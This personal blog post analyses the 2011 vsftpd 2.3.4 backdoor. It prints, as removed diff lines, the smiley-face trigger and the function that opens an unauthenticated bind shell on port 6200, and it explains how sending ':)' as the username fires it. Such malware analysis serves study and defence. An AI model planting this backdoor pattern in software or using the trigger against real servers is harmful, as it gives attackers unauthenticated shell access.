Linxz' Blog

Still trying to think of something witty, I will let you know once I get something...

Home Blog Categories
11 November 2018 | 2 minutes to read

VSFTPD 2.3.4

Tags: backdoor - exploit - python

Introduction

Between June 30th - July 1st 2011 a backdoor was introduced into the vsftpd-2.3.4.tar.gz archive this backdoor allowed an attacker to get a bind shell to the system and thus compromising the system. Although the backdoor was removed quickly (July 3rd 2011) a lot of people downloaded this vulnerable version of VSFTPD, causing quite a lot of panic for sysadmins.

So, how does it work?

In general, it’s actually a pretty simple exploit, and whilst there is a Metasploit module you really don’t need to use it. The backdoor payload is initiated in response to a user sending :) to the server upon being prompted for a username, by sending that smiley face to the server it executes a function which opens a bind shell listener on port 6200 of the affected device.

Code Review

-    else if((p_str->p_buf[i]==0x3a)
-    && (p_str->p_buf[i+1]==0x29))
-    {
-      vsf_sysutil_extra();
-    }

As you can see in the above code, we’re checking if some input is equal to a certain value, to be specific, we’re checking if the user input is equal to 0x3a and 0x29 if this is true then we’re executing vsf_sysutil_extra(); a quick Google on 0x3a tells you it’s a : and a further Google on 0x29 shows a ) so as you can see there is the smiley face. So, now we know that we have this special input, let’s look at the vsf_sysutil_extra(); function as right now we don’t have anything that resembles a vulnerability.

-int
-vsf_sysutil_extra(void)
-{
-  int fd, rfd;
-  struct sockaddr_in sa;
-  if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
-  exit(1);
-  memset(&sa, 0, sizeof(sa));
-  sa.sin_family = AF_INET;
-  sa.sin_port = htons(6200);
-  sa.sin_addr.s_addr = INADDR_ANY;
-  if((bind(fd,(struct sockaddr *)&sa,
-  sizeof(struct sockaddr))) < 0) exit(1);
-  if((listen(fd, 100)) == -1) exit(1);
-  for(;;)
-  {
-    rfd = accept(fd, 0, 0);
-    close(0); close(1); close(2);
-    dup2(rfd, 0); dup2(rfd, 1); dup2(rfd, 2);
-    execl("/bin/sh","sh",(char *)0);
-  }
-}
-
-

As you can see above, we’re creating a bind socket and setting up a listener process on that socket. We’re opening this socket on port 6200 and that is where the vulnerability lies, because we can now connect to this socket without any authentication process taking place.

References

vsftpd 2.3.4 Vulnerable Code